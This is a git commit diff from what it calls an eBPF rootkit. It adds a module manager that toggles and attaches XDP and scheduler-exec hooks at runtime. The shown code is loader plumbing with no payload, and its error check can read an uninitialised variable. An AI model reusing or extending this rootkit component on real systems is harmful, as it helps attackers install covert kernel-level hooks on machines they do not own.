Completed configuration module which enables to change the running ebpf modules in the rootkit at runtime. Minor changes and updated code structure

2025-12-20 08:43:07 +08:00 · 2022-01-04 13:26:13 -05:00
parent 40da6b300b
commit 74873dbca5
10 changed files with 150 additions and 40 deletions
--- a/src/user/include/modules/module_manager.c
+++ b/src/user/include/modules/module_manager.c
@@ -1,12 +1,50 @@
 #include "module_manager.h"
+#include "xdp.h"
+#include "sched.h"

 module_config_t module_config = {
    .xdp_module = {
        .all = ON,
-        .xdp_receive = ON
+        .xdp_receive = OFF
    },
    .sched_module = {
        .all = ON,
-        .handle_sched_process_exec = ON
+        .handle_sched_process_exec = OFF
    }
 };
+
+module_config_attr_t module_config_attr = {
+    .skel = NULL,
+    .xdp_module = {
+        .ifindex = -1,
+        .flags = -1
+    },
+    .sched_module = {}
+};
+
+
+int setup_all_modules(){
+    //Alias
+    module_config_t config = module_config;
+    module_config_attr_t attr = module_config_attr;
+    int ret;
+
+    //XDP
+    if(config.xdp_module.all == ON){
+        ret = attach_xdp_all(attr.skel, attr.xdp_module.ifindex, attr.xdp_module.flags);
+    }else{
+        if(config.xdp_module.xdp_receive == ON) ret = attach_xdp_receive(attr.skel, attr.xdp_module.ifindex, attr.xdp_module.flags);
+    }
+    if(ret!=0) return -1;
+
+    //SCHED
+    if(config.sched_module.all == ON){
+        ret = attach_sched_all(attr.skel);
+    }else{
+        if(config.sched_module.handle_sched_process_exec == ON) ret = attach_handle_sched_process_exec(attr.skel);
+    }
+    if(ret!=0) return -1;
+
+
+    return 0;
+}